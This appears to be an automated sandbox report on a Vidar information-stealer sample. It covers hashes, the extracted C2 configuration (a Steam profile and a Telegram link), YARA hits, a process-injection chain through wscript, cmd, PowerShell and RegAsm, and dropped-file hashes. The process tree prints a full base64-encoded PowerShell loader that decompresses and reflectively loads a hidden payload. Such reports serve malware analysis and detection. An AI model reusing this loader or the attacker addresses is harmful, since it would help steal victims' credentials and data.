Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29-03-2024 02:14
Static task
static1
Behavioral task
behavioral1
Sample
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
⠨/start.vbs
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
⠨/start.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
⠨/temp.bat
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
⠨/temp.bat
Resource
win10v2004-20240226-en
General
-
Target
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe
-
Size
271KB
-
MD5
8b8db4eaa6f5368eb5f64359c6197b43
-
SHA1
e9b51842e2d2f39fa06e466ae73af341ddffe1c8
-
SHA256
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77
-
SHA512
4da734da30af148f246f433b71c72677b9f78698424db15eba364233dff183cb998f9be13d2832872829ac545be1e15ff75ceb85fca3fd0784265fd576db0056
-
SSDEEP
6144:xfL+oq+hnjsVl3dRQTLU+2bRRR17+fYHPfIMDPSBJ7Y/B4aSi3V:xfL5njsVlNuc++Rj17+fYHPfIg4Y54ap
Malware Config
Extracted
vidar
8.6
72f54d93118188013f2386eef7e5cc05
https://steamcommunity.com/profiles/76561199658817715
https://t.me/sa9ok
-
profile_id_v2
72f54d93118188013f2386eef7e5cc05
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Signatures
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/2400-54-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 behavioral2/memory/2400-58-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 behavioral2/memory/2400-60-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 -
Detects Windows executables referencing non-Windows User-Agents 3 IoCs
resource yara_rule behavioral2/memory/2400-54-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/2400-58-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/2400-60-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 3 IoCs
resource yara_rule behavioral2/memory/2400-54-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral2/memory/2400-58-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral2/memory/2400-60-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation wscript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2596 set thread context of 2400 2596 powershell.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2520 2400 WerFault.exe 100 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4244 powershell.exe 4244 powershell.exe 2596 powershell.exe 2596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4244 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4588 wrote to memory of 3244 4588 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe 90 PID 4588 wrote to memory of 3244 4588 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe 90 PID 4588 wrote to memory of 3244 4588 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe 90 PID 3244 wrote to memory of 2180 3244 wscript.exe 91 PID 3244 wrote to memory of 2180 3244 wscript.exe 91 PID 3244 wrote to memory of 2180 3244 wscript.exe 91 PID 2180 wrote to memory of 4244 2180 cmd.exe 93 PID 2180 wrote to memory of 4244 2180 cmd.exe 93 PID 2180 wrote to memory of 4244 2180 cmd.exe 93 PID 2180 wrote to memory of 2596 2180 cmd.exe 98 PID 2180 wrote to memory of 2596 2180 cmd.exe 98 PID 2180 wrote to memory of 2596 2180 cmd.exe 98 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100 PID 2596 wrote to memory of 2400 2596 powershell.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe"C:\Users\Admin\AppData\Local\Temp\55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4244
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:2400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 22766⤵
- Program crash
PID:2520
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2400 -ip 24001⤵PID:4084
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ee6d2d219d1affb98fb9dc1de51d895e
SHA1aaa2ceb5f7214c76b8a050a06d257cdc30d6bb48
SHA256017fb2bedc94f0480d208611df6b42589d407fc4338e1f5dc1e00a9fd52752e0
SHA51252139b56af32835b93fb8eb93b553325e36654debe5c15e6b61930ffe8027e0ee5eb0998da4c37ec047c052522a022d7103c33d7495eb1a3504cfee1780229bf
-
Filesize
1KB
MD50f53674af0c42551f18bc45e0b21bf4c
SHA12a9020c08a5ffddc575f47aa0a6cb3b2afc16105
SHA2563a3d70d7800b5170d3112cfdc66b3b8a021c167f8e33eb1e10235d6aec961c4e
SHA512a3209e5ce88836811c39a15713d74c4cf868da3c2da9fc8b0f52a3e1ab3ffde1cf9e3cbf6b8c2c2f9507c25d8a4a1d58c9b8c846dcc2bf8626bcae0ef71cf457
-
Filesize
16KB
MD54162258abeb66863cadf3c6dce787c16
SHA1ef96f4045ee5509d39e25bb5c5528bcf9e8d9861
SHA256a529c95a2ecb24ab0f3e5773ccbf1b8e019dbb5afb20bdaf567382f70a8306fd
SHA51266fceab5d3953317f0dcf945581c64073aee2ae13ad75defb5538f782f7c669cdbc4cf0b051ec25bd0b19fd2b60a3d0cc4cd3b6998faa7a43f148c8773d74279
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
231B
MD5abe1dd23ab4c11aae54f1898c780c0b5
SHA1bb2f974b3e0af2baa40920b475582bfd4fb28001
SHA25689054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12
SHA512e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d
-
Filesize
204KB
MD572b17467a49b7813856fa604d1d291c8
SHA13116d07854d56f0bc505be8b80804a7319208739
SHA256e24aaddfa2ece0891ad7b3c51779c65bbf95e4fded59fc46fe4fef311e1de3e1
SHA51238c99cc716097ee7cb642203432ffbd1ef6ce8a0c9b21aa2827962b82456ecb3113fa1edd362aab013737e3bdfb2d0803145fc0caf612054ba47f6454c3a4843